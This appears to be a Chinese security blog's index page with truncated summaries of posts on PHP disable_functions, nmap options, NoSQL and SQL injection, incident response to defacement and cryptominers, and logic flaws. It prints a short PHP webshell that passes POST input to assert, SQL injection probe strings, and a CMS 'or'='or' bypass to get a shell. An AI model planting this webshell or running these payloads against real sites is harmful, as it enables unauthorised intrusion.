摘要: 为了安全,运维人员会禁用PHP的一些“危险”函数,将其写在php.ini配置文件中,就是我们所说的disable_functions了。例如: passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,p 阅读全文
posted @ 2020-04-22 19:25 wudixiaoherry 阅读(1679) 评论(0) 推荐(0) 编辑
摘要: NMAP常用参数-sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信息。-sP ping扫描,加上这个参数会使用ping扫描,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping,却实际存在。-sS 半开扫描,一般不会记入日志,不过 阅读全文
posted @ 2020-04-21 17:58 wudixiaoherry 阅读(178) 评论(0) 推荐(0) 编辑
摘要: 1.php <?php $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['joker']); ?> 用法: http://www.xxx.com/1.php 菜刀连接用法: http://www.xxx.com/1.p 阅读全文
posted @ 2020-04-02 12:31 wudixiaoherry 阅读(478) 评论(0) 推荐(0) 编辑
摘要: 在传统的 SQL 注入中,攻击者会尝试破坏 SQL 查询语句并在服务器端修改查询语句。使用 NoSQL 注入,攻击可以 在应用程序的其他区域中执行,而不是在传统的 SQL 注入中执行。此外,在传统的 SQL 注入中,攻击者会使用一个 标记来发起攻击。在 NoSQL 注入中,在NoSQL注入中,通常存 阅读全文
posted @ 2019-11-22 19:04 wudixiaoherry 阅读(308) 评论(0) 推荐(0) 编辑
摘要: 1.第一次接到这个单子的时候以为很简单,网页篡改无非就是JS或者index页面出现了问题。 2.去网站访问一下,发现跳转到菠菜页面,直接拿到远程登陆账号密码登陆进去,查看网站根目录。 3.发现网站中有一个index 一个indax 查看源码发现 index是菠菜页面,indax是正常页面,我重新恢复 阅读全文
posted @ 2019-08-27 09:47 wudixiaoherry 阅读(279) 评论(0) 推荐(0) 编辑
摘要: 项目介绍 针对挖矿木马,蠕虫病毒,网站挂马,网站篡改,网站暗链,系统漏洞的一些安全事件的处置经验,思路,日志分析,溯源什么的和一些简单的逆向 未来想做一些什么? Webshell查杀,对于我们做应急的人员来说其实很鸡肋,windows服务器还好说,我们可以在客户服务器上下一个D盾Web查杀对吧,D盾 阅读全文
posted @ 2019-08-27 09:37 wudixiaoherry 阅读(257) 评论(0) 推荐(0) 编辑
摘要: 1.拿到了一个靶机,top检查,发现有一个进程CPU利用率一直在百分之百,经过特征对比,发现是挖矿木马 2.利用 ll /proc/端口ID/exe 定位木马文件所在位置 3.rm -rf 删除掉木马文件 4.原本以为搞定了,过了一会发现还是有利用率百分之百情况 5.查看 cat /var/spoo 阅读全文
posted @ 2019-08-16 08:19 wudixiaoherry 阅读(1184) 评论(0) 推荐(0) 编辑
摘要: Web安全测试中常见逻辑漏洞解析(实战篇) 简要: 越权漏洞是比较常见的漏洞类型,越权漏洞可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽,对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,导致用户A可以操作其他人的信息。​ 阅读全文
posted @ 2019-07-18 21:02 wudixiaoherry 阅读(18274) 评论(0) 推荐(1) 编辑
摘要: 注:本文主要总结雷池三个版本的几个漏洞并简单说下拿shell,善于总结进步才快。呵呵,本文献给和我一样的小菜,高手掠过!初学asp,有错请提出~谢谢!一、’or’=’or’漏洞1.漏洞分析漏洞文件当然在后台验证文件上,/admin/CHKLOGIN.ASP中,见代码4-7行:dim rsadmin1 阅读全文
posted @ 2019-07-17 20:37 wudixiaoherry 阅读(399) 评论(0) 推荐(0) 编辑
摘要: ①判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@ 阅读全文
posted @ 2019-07-17 12:22 wudixiaoherry 阅读(151) 评论(0) 推荐(0) 编辑